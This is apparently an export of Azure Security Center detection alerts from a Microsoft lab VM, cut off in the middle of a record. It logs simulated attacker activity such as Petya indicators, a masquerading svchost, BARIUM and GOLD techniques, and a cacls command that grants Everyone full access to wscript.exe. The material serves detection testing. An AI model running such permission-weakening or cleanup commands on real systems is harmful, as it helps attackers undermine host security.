106,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,f9ddd8b3-5fa8-4f2f-b811-bdca90091195,2518547714853062206_f9ddd8b3-5fa8-4f2f-b811-bdca90091195,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x123c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x123c"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
107,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,3252483f-2fdb-411a-93f5-e268d5e56abf,2518547714816637303_3252483f-2fdb-411a-93f5-e268d5e56abf,Detection,Microsoft,Detected suspicious file creation,Detected suspicious file creation,Detected suspicious file creation,Analysis of host data on MSTICALERTSWIN1 detected creation or execution of a process which has previously indicated post-compromise action taken on a victim host by activity group BARIUM. This activity group has been known to use this technique to download additional malware to a compromised host after an attachment in a phishing doc has been opened.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""powershell wscript.shell used to download a .gif\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1728"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: BARIUM\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-BARIUM.pdf?sv=2018-03-28&sr=b&sig=zdHvTlFfFEPYM9gxXSaUyQlSunoUx692qwD1bqdLrhs%3D&spr=https&st=2019-01-15T05:00:26Z&se=2019-04-15T05:15:26Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1728"",
""CommandLine"": ""cmd /c \""powershell wscript.shell used to download a .gif\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
108,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,fa4939d4-a20c-440a-839c-89c0c43e1ccc,2518547714812938298_fa4939d4-a20c-440a-839c-89c0c43e1ccc,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xc18"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=pbso6xXF6nk7cwihw20Kh77IZl0%2BrxBRrf%2FxX8l7tdU%3D&spr=https&st=2019-01-14T19:39:23Z&se=2019-04-14T19:54:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xc18"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
109,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,0e8db234-9727-41f3-a6e0-0773519603d2,2518547714833232927_0e8db234-9727-41f3-a6e0-0773519603d2,Detection,Microsoft,Detected suspicious commandline used to start all executables in a directory,Detected suspicious commandline used to start all executables in a directory,Detected suspicious commandline used to start all executables in a directory,Analysis of host data has detected a suspicious process running on MSTICALERTSWIN1. The commandline indicates an attempt to start all executables (*.exe) that may reside in a directory. This could be an indication of a compromised host.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": "".\\netsh.exe \""in (*.exe) do start # artificial commandline solely for purposes of triggering test\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbb4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbb4"",
""CommandLine"": "".\\netsh.exe \""in (*.exe) do start # artificial commandline solely for purposes of triggering test\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
110,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,c0822e2b-785b-41a8-8136-21b7430a0078,2518547714814450855_c0822e2b-785b-41a8-8136-21b7430a0078,Detection,Microsoft,Detected suspicious file cleanup commands,Detected suspicious file cleanup commands,Detected suspicious file cleanup commands,"Analysis of host data on MSTICALERTSWIN1 detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing post-compromise self-cleanup activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession, followed by a delete command in the way that has occurred here is rare.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo \"" systeminfo && systeminfo && del \"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17cc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=lfXooLPlTvNTSBe0WX9kaSKTtj1xl%2BbWiE6h7bkA1jI%3D&spr=https&st=2019-01-14T11:45:21Z&se=2019-04-14T12:00:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17cc"",
""CommandLine"": ""cmd /c echo \"" systeminfo && systeminfo && del \"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
111,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,fcbb6bb7-4c7c-488e-903c-f625e98db7c4,2518547714825902697_fcbb6bb7-4c7c-488e-903c-f625e98db7c4,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15ec"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=EEcvVV%2B6vHgaVPH1tjpS9gsjkHMUstMpQzuYn5tgK%2B8%3D&spr=https&st=2019-01-14T14:09:41Z&se=2019-04-14T14:24:41Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15ec"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
112,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,b2d9be9f-58e2-4174-8658-419670393253,2518547714824290520_b2d9be9f-58e2-4174-8658-419670393253,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1658"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1658"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
113,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,1ba5718e-529b-441b-8036-ad06ee862e76,2518547714815952205_1ba5718e-529b-441b-8036-ad06ee862e76,Detection,Microsoft,Detected suspicious use of Cacls to lower the security state of the system.,Detected suspicious use of Cacls to lower the security state of the system.,Detected suspicious use of Cacls to lower the security state of the system.,"Attackers use myriad ways like brute force, spear phishing etc. to achieve initial compromise and get a foothold on the network. Once initial compromise is achieved they often take steps to lower the security settings of a system. Cacls—short for change access control list—is a Microsoft Windows native command-line utility often used for modifying the security permissions on folders and files. A lot of the time the binary is used by the attackers to lower the security settings of a system. This is done by giving Everyone full access to some of the system binaries like ftp.exe, net.exe, wscript.exe etc. Analysis of host data on MSTICALERTSWIN1 detected suspicious use of Cacls to lower the security of a system.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cacls.exe"",
""Suspicious Command Line"": ""cacls.exe c:\\windows\\system32\\wscript.exe /e /t /g everyone:f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1798"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cacls.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1798"",
""CommandLine"": ""cacls.exe c:\\windows\\system32\\wscript.exe /e /t /g everyone:f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
114,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,a5df127a-f7e8-44ff-b404-6d5b37d06488,2518547714813299511_a5df127a-f7e8-44ff-b404-6d5b37d06488,Detection,Microsoft,Detected the disabling of critical services,Detected the disabling of critical services,Detected the disabling of critical services,"The analysis of host data on MSTICALERTSWIN1 detected execution of the ""net.exe stop"" command being used to stop critical services like SharedAccess or Windows Security Center. The stopping of either of these services can be an indication of malicious behavior.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
